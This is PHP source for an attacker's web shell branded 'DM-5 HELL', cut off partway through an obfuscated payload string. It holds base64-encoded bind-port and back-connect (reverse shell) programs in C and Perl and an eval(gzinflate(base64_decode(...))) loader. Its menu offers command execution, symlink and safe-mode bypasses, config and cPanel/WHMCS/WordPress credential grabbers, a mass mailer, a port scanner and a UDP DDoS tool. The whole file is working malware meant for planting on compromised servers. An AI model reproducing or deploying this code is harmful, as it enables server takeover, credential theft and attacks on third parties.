- $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
- $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
- $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
- $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
- ?>
- <html><head>
- <title>
- :: AZZATSSINS ::
- </title>
- <script type="text/javascript">
- function tukar(lama,baru){
- document.getElementById(lama).style.display = 'none';
- document.getElementById(baru).style.display = 'block';
- }
- function blink() {
- var blinks = document.getElementsByTagName('kelip');
- for (var i = blinks.length - 1; i >= 0; i--) {
- var s = blinks[i];
- s.style.visibility = (s.style.visibility === 'visible') ? 'hidden' : 'visible';
- }
- window.setTimeout(blink, 500);
- }
- if (document.addEventListener) document.addEventListener("DOMContentLoaded", blink, false);
- else if (window.addEventListener) window.addEventListener("load", blink, false);
- else if (window.attachEvent) window.attachEvent("onload", blink);
- else window.onload = blink;
- </script>
- <style type="text/css">
- body{
- background:#000000;
- }
- a { text-decoration:none; }
- a:hover{ border-bottom:1px solid white; }
- *{ font-size:11px;font-family:Tahoma,Verdana,Arial;color:#FFFFFF; }
- #menu{ background:#111111;margin:8px 2px 4px 2px; }
- #menu a{ padding:4px 18px;
- margin:0;
- background:#222222;
- text-decoration:none;
- letter-spacing:2px;
- border-radius: 4px;
- border-bottom:2px solid #444444;
- border-top:2px solid #444444;
- border-right:2px solid red;
- border-left:2px solid red;
- }
- #menu a:hover{
- background:#191919;
- border-radius: 7px;
- border-bottom:2px solid #white;
- border-top:2px solid #white;
- border-right:2px solid #FF0000;
- border-left:2px solid #FF0000;
- }
- .tabnet{ margin:15px auto 0 auto;border: 1px solid #333333; }
- .main {
- width:90%;
- margin:30px auto 10px;
- padding:10px 10px 5px 10px;
- border-radius:5px;
- -moz-border-radius:5px;
- -moz-box-shadow:0px 0px 10px #FFFFFF;
- }
- .gaya { color: red; }
- .gaya a { color: white; }
- .inputz{ background:#111111;
- border:0;
- padding:2px;
- border-bottom:1px solid #FF0000;
- border-top:1px solid #FF0000; }
- .inputzbut{
- background:#111111;
- color:#FF0000;
- margin:0 4px;
- border:1px solid #444444;
- border-bottom:1px solid #FF0000;
- border-top:1px solid #FF0000;
- border-right:1px solid #FF0000;
- border-left:1px solid #FF0000;
- }
- .inputz:hover, .inputzbut:hover{
- border-bottom:1px solid white;
- border-top:1px solid white;
- }
- .output { margin:auto;
- border:1px solid #FF0000;
- width:100%;
- height:400px;
- background:#000000;
- padding:0 2px; }
- .cmdbox{ width:100%; }
- .head_info{ padding: 0 4px; }
- .dminfox {
- font-size:11px;
- font-family:Tahoma,Verdana,Arial;
- color:white;
- }
- .infodmx {
- font-size:11px;
- font-family:Tahoma,Verdana,Arial;
- color:red;
- }
- .b0{
- font-size:30px;padding:0;color:#444444;
- }
- .b1{
- font-size:25px;padding:0;color:red;
- }
- .b2{
- font-size:25px;padding:0;color:white;
- }
- .b3{
- font-size:10px;padding:0;color:red;
- }
- .b4{
- font-size:20px;padding:0;color:#FF0000;
- }
- .b5{
- font-size:20px;padding:0;color:#FFFFFF;
- }
- .b6{
- font-size:20px;padding:0;color:#00FF00;
- }
- .b7{
- font-size:20px;padding:0;color:red;
- }
- .b8{
- font-size:20px;padding:0;color:white;
- }
- .b9{
- font-size:20px;padding:0;color:yellow;
- }
- .b10{
- font-size:20px;padding:0;color:#444444;
- }
- .b11{
- font-size:10px;padding:0;color:yellow;
- }
- .b12{
- font-size:10px;padding:0;color:#444444;
- }
- .b_tbl{ text-align:center;
- margin:0 1px 0 0;
- padding:0 1px 0 0;
- border-right:1px solid #333333; }
- .c_tbl{ text-align:center;
- margin:0 4px 0 0;
- padding:0 4px 0 0;
- border-left:1px solid #333333; }
- .phpinfo table{ width:100%;
- padding:0 0 0 0; }
- .phpinfo td{ background:#191919;
- color:#cccccc;
- padding:6px 8px;; }
- .phpinfo th, th{ background:#111111;
- border-bottom:1px solid #333333;
- font-weight:normal; }
- .phpinfo h2, .phpinfo h2 a{ text-align:center;
- font-size:16px;
- padding:0;
- margin:30px 0 0 0;
- background:#222222;
- padding:4px 0; }
- .explore{ width:100%; }
- .explore a { text-decoration:none; }
- .explore td{ border-bottom:1px solid white;
- padding:0 8px;
- line-height:10px; }
- .explore th{ padding:3px 8px;
- font-weight:normal; }
- .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid white; }
- .explore tr:hover{ background:#444444;
- cursor:pointer; }
- .viewfile{ background:#EDECEB;
- color:#000000;
- margin:4px 2px;
- padding:8px; }
- .sembunyi{ display:none;
- padding:0;margin:0;}
- .info{ background:#111111;
- width:99%;
- padding:5px;
- margin:10px auto 5px;
- text-align:center;
- font-size:13px;}
- .info a{ font-size:14px;}
- .info span{ font-size:14px;}
- .jaya{ margin:5px; text-align:right; }
- </style>
- </head>
- <body onLoad="document.getElementById('cmd').focus();">
- <div class="main"><div class="head_info">
- <table><tr><td>
- <table class="b_tbl">
- <tr><td>
- <a href="?"><img src="http://azzat.wap.mu/files/1049320/az-bn-idb.png" width="140" heigth="125"></a>
- </td></tr>
- <tr><td>
- <nobr><b><span class="b1">DM-5</span><span class="b2">HELL</span></b></a></nobr>
- </td></tr>
- <tr><td>
- <nobr><b><span style=font-size:15px;padding:0;color:#444444;">Private Security Web Shell</span></b></nobr>
- </td></tr>
- <tr><td><? if(isset($auth_pass)){ echo "<form method='POST'> <input type='SUBMIT' class='inputz' name='logout' value=' [ LOG OUT ] '></form>"; } ?></td></tr>
- </table>
- </td>
- <td><?php echo $buff; ?></td>
- </tr></table></div>
- <!-- ARE YOU READY ? :D -->
- <!-- 1 -->
- <!-- 2 -->
- <!-- 3 -->
- <!-- LET'S PLAY THE MUSIC :D -->
- <br><br>
- <div id="menu" align="center">
- <table><tr>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>">HOME</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=".$pwd; ?>&x=phpinfo">PHP INFO</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=mysql1">MYSQL I</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=mysql2">MYSQL II</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=upload">UPLOAD</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=mail">MAILER</a></b></td>
- </tr></table></div>
- <!-- Let's Make A Little Command For Safety First :) -->
- <div id="menu" align="center">
- <table><tr>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=php">EVAL</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=shell">SHELL</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=dmsec1">HTACCESS</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=dmsec2">PHP.INI</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=dmsec3">BASEDIR</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=dmsec4">PROCESS</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=netsploit">NETSPLOIT</a></b></td>
- </tr></table></div>
- <!-- Next You Always Say This Is Config Fvcker -->
- <!-- Oh Yeah Honey :* Please Don't Tell Everybody If You Will Fucking Me Now :* -->
- <div id="menu" align="center"><table><tr>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=jumping">JUMP</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=grabber">GRAB</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=ckperl">PERL</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=apache">APACHE</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=hostgator">HOSTGATOR</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=bluehost">BLUEHOST</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=ovh">OVH</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=litespeed">LITESPEED</a></b></td>
- </tr></table></div>
- <!-- Are You Like Symlink Methode ? Haha :D Funny LoL -->
- <div id="menu" align="center"><table><tr>
- <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "dm=" . $pwd; ?>&x=dmsym1">SYMLINK1</a></b></nobr></td>
- <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "dm=" . $pwd; ?>&x=dmsym2">SYMLINK2</a></b></nobr></td>
- <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "dm=" . $pwd; ?>&x=dmsym3">SYMLINK3</a></b></nobr></td>
- <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "dm=" . $pwd; ?>&x=dmsym4">SYMLINK4</a></b></nobr></td>
- <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "dm=" . $pwd; ?>&x=dmsym5">SYMLINK5</a></b></nobr></td>
- <td style=\"text-align:center;\"><nobr><b><a href="?<?php echo "dm=" . $pwd; ?>&x=dmsym6">SYMLINK6</a></b></nobr></td>
- </tr></table></div>
- <!-- Hhmmm... Are You Like WHMCS ? -->
- <!-- Haha Me Too :D Think Again Dude -->
- <!-- If You And Me Like WHMCS, WHO WE ARE ;D Lolers? -->
- <div id="menu" align="center"><table><tr>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=whmcs1">WHMCS</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=whmcs2">WHMCS II</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=plesk">PLESK</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=reseller">RESELLER</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=crypter">ENCRYPT</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=cgi2012">CGI2012</a></b></td>
- </tr></table></div>
- <!-- How About This Man ? -->
- <!-- nanana yayaya lalala enjoy the cms ;v -->
- <div id="menu" align="center"><table><tr>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=cpanel">CPANEL</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=iis7">IIS 7.5</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=dmwp">WP</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=dmjm">JOOMLA</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=dmvb">VB</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=skype">SKYPE</a></b></td>
- </tr></table></div>
- <!-- Sexy Women Sexy On Your Bed :D wkwkwk -->
- <div id="menu" align="center"><table><tr>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=unzip">UNZIP</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=coding">ENCODE</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=analyzer">ANALYZER</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=tools">OTHER TOOLS</a></b></td>
- </tr></table></div>
- <!-- Maybe This Can Help You :) -->
- <div id="menu" align="center"><table><tr>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=sscan">SHELL SCAN</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=pscan">PORT SCAN</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=ddos">UDP DDOS</a></b></td></tr></table></div>
- <!-- Last Songs From EviLolers -->
- <div id="menu" align="center"><table><tr>
- <td style=\"text-align:center;\"><b><a href="?<?php echo "dm=" . $pwd; ?>&x=about">ABOUT ME</a></b></td>
- <td style=\"text-align:center;\"><b><a href="?<?phwd; ?>&x=kill">KILL SHELL</a></b></td>
- </tr></table></div>
- <!-- Okay... It's Time To Play.. With Us.. -->
- <!-- You'll Never Know Before You Try It First -->
- <?php
- if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
- <form action="?dm=<?php echo $pwd; ?>&x=php" method="post">
- <table class="cmdbox"><tr><td>
- <textarea class="output" name="cmd" id="cmd"><? eval(gzinflate(base64_decode('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